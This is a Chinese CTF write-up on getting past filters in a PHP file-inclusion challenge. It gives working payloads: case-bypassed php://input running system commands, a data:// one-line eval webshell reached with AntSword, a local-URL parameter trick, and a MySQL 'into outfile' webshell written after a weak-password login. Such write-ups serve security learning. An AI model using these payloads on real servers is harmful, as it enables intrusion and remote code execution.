PHP文件包含漏洞-绕过过滤的姿势

echoDetected

如图,过滤了php常用的伪协议

1.大小写绕过

Php://input

抓包,并在数据包中写入<?php system(\'ls\'); ?>查看目录下文件

发现存在fl4gisisish3r3.php的文件,使用system(\'cat fl4gisisish3r3.php\')读取

 

2.用data伪协议写入一句话木马

payload:?page=data://text/plain,<?php @eval($_POST[\'pass\']);?>

蚁剑连接没问题,奇怪的姿势增加了

当然也可以用data伪协议,使用第一种方法慢慢找flag

 

3.用hello输出flag

1.审计php代码,while函数根据page参数来判断php文件是否存在,如果存在此文件,则进行文件包含。

2.默认页面为http://127.0.0.1/index.php,设置为page值,可确保while为真

3.利用hello参数将执行内容显示

paylaod:?page=http://127.0.0.1/index.php/?hello=<?system(\'ls\');?>

                 ?page=http://127.0.0.1/index.php/?hello=<?show_source(\'fl4gisisish3r3.php\');?>

 

 

4.数据库写入

扫描后台

弱口令(甚至没有密码)

payload:select "<?php eval(@$_POST[\'ctf\']); ?>"into outfile \'/tmp/test.php\' 

需要自己去寻找路径

之后蚁剑连接,也得到了flag,

奇怪的姿势又增加了

 

分类:

技术点:

相关文章:

  • 2021-09-29
  • 2021-11-06
  • 2021-05-28
  • 2021-12-02
  • 2021-10-31
  • 2021-09-29
  • 2021-09-29
  • 2021-09-29
猜你喜欢
  • 2021-11-06
  • 2021-05-16
  • 2020-04-19
  • 2021-12-22
  • 2021-09-29
相关资源
相似解决方案
热门标签
Java Python linux javascript Mysql C# Docker 算法 前端 SpringBoot Redis Vue spring 设计模式 .net core .net kubernetes c++ 数据库 数据结构 大数据 js 机器学习 微服务 Android Go 程序员 面试 JVM ASP.net core 云原生 人工智能 后端 PHP git CSS golang k8s Nginx Django mybatis 深度学习 多线程 React 架构 devops 爬虫 云计算 Spring Boot LeetCode